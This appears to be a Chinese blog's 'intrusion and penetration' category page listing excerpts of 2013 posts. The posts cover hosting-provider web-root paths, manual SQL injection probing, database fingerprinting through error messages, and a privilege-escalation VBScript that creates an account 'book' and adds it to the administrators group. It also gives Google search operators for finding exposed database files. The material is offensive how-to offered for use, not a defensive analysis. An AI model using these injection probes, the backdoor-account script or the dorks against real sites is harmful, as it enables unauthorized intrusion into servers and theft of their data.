入侵渗透
关注
分享
扫一扫
文章平均质量分 66
梦在飞翔
屌丝程序员
展开
-
常见虚拟机路径对照表
D:\virtualhost\web580651\www\ 新网虚拟主机 F:\usr\fw04408\xpinfo\ 万网虚拟主机 D:\hosting\wwwroot\ Prim@Hosting虚拟主机e:\wwwroot\longzhihu\wwwroot\ 华众虚拟主机 d:\freehost\zhoudeyang\web\ 星外虚拟主机主机 D:\vhostroo原创 2013-04-24 11:18:31 · 2362 阅读 · 0 评论 -
sql手工注入
第一,判断有无注入点 ' ; and 1=1 and 1=2第二,猜表: 常见的表有:admin adminuser user pass password 等..and 0and 0第三,.猜帐号数目 如果遇到0and 0and 1第四,.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from原创 2013-04-24 11:20:56 · 813 阅读 · 0 评论 -
大型网站攻防
判断数据库类型1.网站注入点后面加上 and user>0 如果返回Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 为MS SQL 数据库 如果返回Microsoft OLE DB pROVIDER FOR ODBC Driver 错误 '80040e10' 为Access数据库原创 2013-04-24 11:24:28 · 861 阅读 · 0 评论 -
服务器提权总结
迅雷下载提权Set vbs = CreateObject("Wscript.Shell")vbs.run "cmd /c net user book book /add",0vbs.run "cmd /c net localgroup administrators book /add",0PCAnywhere连接提权跳转C:\Documents and Settin原创 2013-04-24 11:27:35 · 1240 阅读 · 0 评论 -
谷歌搜索语法
操作系统的判断操作系统 TTLLINUX 64WIN2K/NT 128WINDOWS 系列 32UNIX 系列 255-----------------------------一些谷歌搜集的语法allinurl:bbs data 查找所有BBS中含有data的urlfiletype:mdb inurl:database 查原创 2013-04-24 11:31:22 · 961 阅读 · 0 评论